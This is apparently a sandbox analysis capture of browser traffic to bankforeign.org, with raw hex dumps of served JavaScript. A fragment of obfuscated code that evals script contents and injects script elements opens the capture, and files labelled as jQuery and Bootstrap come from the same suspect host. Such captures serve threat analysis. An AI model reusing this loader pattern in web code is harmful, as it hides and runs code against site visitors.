                                                            2024-02-01 20:38:42 UTC945INData Raw: 34 36 27 29 5d 28 63 28 30 78 31 35 39 29 29 3b 57 3f 58 5b 63 28 27 30 78 31 36 35 27 29 5d 28 57 29 3a 65 76 61 6c 28 53 5b 79 5d 5b 63 28 30 78 31 34 62 29 5d 29 3b 7d 76 61 72 20 45 3d 54 5b 63 28 30 78 31 36 64 29 5d 28 63 28 30 78 31 37 30 29 29 3b 66 6f 72 28 76 61 72 20 79 3d 30 78 30 3b 79 3c 45 5b 63 28 27 30 78 31 35 35 27 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 6e 3d 45 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 61 29 29 3b 69 66 28 6e 26 26 6e 5b 63 28 27 30 78 31 37 64 27 29 5d 28 63 28 30 78 31 35 30 29 29 29 7b 76 61 72 20 75 3d 64 6f 63 75 6d 65 6e 74 5b 63 28 27 30 78 31 37 39 27 29 5d 28 63 28 27 30 78 31 37 30 27 29 29 3b 75 5b 63 28 30 78 31 34 65 29 5d 28 63 28 30 78 31 37 37 29 2c 63 28 30 78 31 36 63 29 29 2c 75
                                                            Data Ascii: 46')](c(0x159));W?X[c('0x165')](W):eval(S[y][c(0x14b)]);}var E=T[c(0x16d)](c(0x170));for(var y=0x0;y<E[c('0x155')];y++){var n=E[y][c('0x146')](c(0x15a));if(n&&n[c('0x17d')](c(0x150))){var u=document[c('0x179')](c('0x170'));u[c(0x14e)](c(0x177),c(0x16c)),u
                                                            2024-02-01 20:38:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.449774104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:42 UTC1140OUTGET /jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adc HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:44 UTC632INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:44 GMT
                                                            Content-Type: text/javascript
                                                            Content-Length: 85578
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Accept-Ranges: bytes
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XqOQcu16YlUSsUm069z%2FqhmVHVZtfiwk1iZM05AVXVo%2FbgT5uMr77DqtWwSizA807QEskQQRS%2BtSuqbUiup%2FIOIBoa%2Fhb6AGApL7CIVYvs99S4PcJiHKfWDNAEFGCxxuL8U%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffe71917adb0-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:44 UTC737INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e
                                                            Data Ascii: /*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a documen
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72
                                                            Data Ascii: [a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){retur
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 6b 2e 63 61 6c 6c 28 61 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 21 6b 2e 63 61 6c 6c 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 7b 7d 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 62 20 69 6e 20 61 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 62 7c 7c 6b 2e 63 61 6c 6c 28 61 2c
                                                            Data Ascii: seFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b in a);return void 0===b||k.call(a,
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 61 70 70 6c 79 28 5b 5d 2c 68 29 7d 2c 67 75 69 64 3a 31 2c 70 72 6f 78 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 66 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 63 3d 61 5b 62 5d 2c 62 3d 61 2c 61 3d 63 29 2c 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 3f 28 64 3d 65 2e 63 61 6c 6c 28 61 72
                                                            Data Ascii: ,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=a,a=c),n.isFunction(a)?(d=e.call(ar
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 4e 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 50 3d 6e 65 77 20 52 65 67 45 78 70 28 4c 2b 22 2b 22 2c 22 67 22 29 2c 51 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4c 2b 22 2b 24 22 2c 22 67 22 29 2c 52 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2a 2c 22 2b 4c 2b 22 2a 22 29 2c 53 3d 6e 65 77 20 52 65 67 45 78
                                                            Data Ascii: )|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new RegExp("^"+L+"*,"+L+"*"),S=new RegEx
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 64 3d 64 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 61 7c 7c 21 61 7c 7c 31 21 3d 3d 78 26 26 39 21 3d 3d 78 26 26 31 31 21 3d 3d 78 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c 7c 6e 2c 70 29 29 7b 69 66 28 31 31 21 3d 3d 78 26 26 28 6f 3d 24 2e 65 78 65 63 28 61 29 29 29 69 66 28
                                                            Data Ascii: [c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b||n,p)){if(11!==x&&(o=$.exec(a)))if(
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 3b 69 66 28 63 29 77 68 69 6c 65 28 63 3d 63 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 63 3d 3d 3d 62 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 61 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6c 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65
                                                            Data Ascii: Handle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return function(b){var c=b.nodeName.toLowerCase
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 63 3f 5b 63 5d 3a 5b 5d 7d 7d 2c 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 62 7d 7d 29 3a 28 64 65 6c 65 74 65 20 64 2e 66 69 6e 64 2e 49 44 2c 64 2e 66 69 6c
                                                            Data Ascii: ength}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("id")===b}}):(delete d.find.ID,d.fil
                                                            2024-02-01 20:38:44 UTC1022INData Raw: 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4c 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c
                                                            Data Ascii: ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled").length||q.push(":enabled",":disabl
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 3b 72 65 74 75 72 6e 20 64 3f 64 3a 28 64 3d 28 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 61 29 3d 3d 3d 28 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 29 3f 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 62 29 3a 31 2c 31 26 64 7c 7c 21 63 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 62 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 61 29 3d 3d 3d 64 3f 61 3d 3d 3d 6e 7c 7c 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 61 29 3f 2d 31 3a 62 3d 3d 3d 6e 7c 7c 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69
                                                            Data Ascii: ;return d?d:(d=(a.ownerDocument||a)===(b.ownerDocument||b)?a.compareDocumentPosition(b):1,1&d||!c.sortDetached&&b.compareDocumentPosition(a)===d?a===n||a.ownerDocument===v&&t(v,a)?-1:b===n||b.ownerDocument===v&&t(v,b)?1:k?J(k,a)-J(k,b):0:4&d?-1:1)}:functi


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.449776104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:42 UTC1142OUTGET /boot/a8fa5b4494ce08322db1f933d9e75f5e65bc015265ade HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:44 UTC624INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:44 GMT
                                                            Content-Type: text/javascript
                                                            Content-Length: 51039
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Accept-Ranges: bytes
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8sy0fHMn8BpUx9W12ItrzDT4Av9Gpm4O3vqEUZrbJoEtB4ztKxZ8t7hSXN0aqUdrbMSqlyUon031gy8ZZnNRzW3MusjQQeWHHkKXqS2B0sb4jefr1DLcR%2FRpZJBZPTLjPQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffe728d77bc0-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:44 UTC745INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                                                            Data Ascii: /*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 26 26 28 65 3d 65 2e 63 6f 6e 63 61 74 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 6f 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6f 2c 74 29 2e 65 6e 75 6d
                                                            Data Ascii: {for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 3b 65 26 26 22 23 22 21 3d 3d 65 7c 7c 28 65 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66 22 29 7c 7c 22 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 3f 65 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 67 65 74 54 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 46 72 6f 6d 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 30 3b 76 61 72 20 65 3d 69 28 74 29 2e 63 73 73 28 22 74 72 61 6e 73 69 74 69 6f
                                                            Data Ascii: FromElement:function(t){var e=t.getAttribute("data-target");e&&"#"!==e||(e=t.getAttribute("href")||"");try{return document.querySelector(e)?e:null}catch(t){return null}},getTransitionDurationFromElement:function(t){if(!t)return 0;var e=i(t).css("transitio
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 65 6e 74 28 65 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 7c 7c 74 68 69 73 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 6f 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 74 2e 5f 67 65 74 52 6f 6f 74 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 29 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 65 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 29 29 2c 6e 7c 7c 28 6e 3d 72 28 74 29 2e 63 6c 6f 73 65 73 74 28 22 2e
                                                            Data Ascii: ent(e).isDefaultPrevented()||this._removeElement(e)},t.dispose=function(){r.removeData(this._element,o),this._element=null},t._getRootElement=function(t){var e=Fn.getSelectorFromElement(t),n=!1;return e&&(n=document.querySelector(e)),n||(n=r(t).closest(".
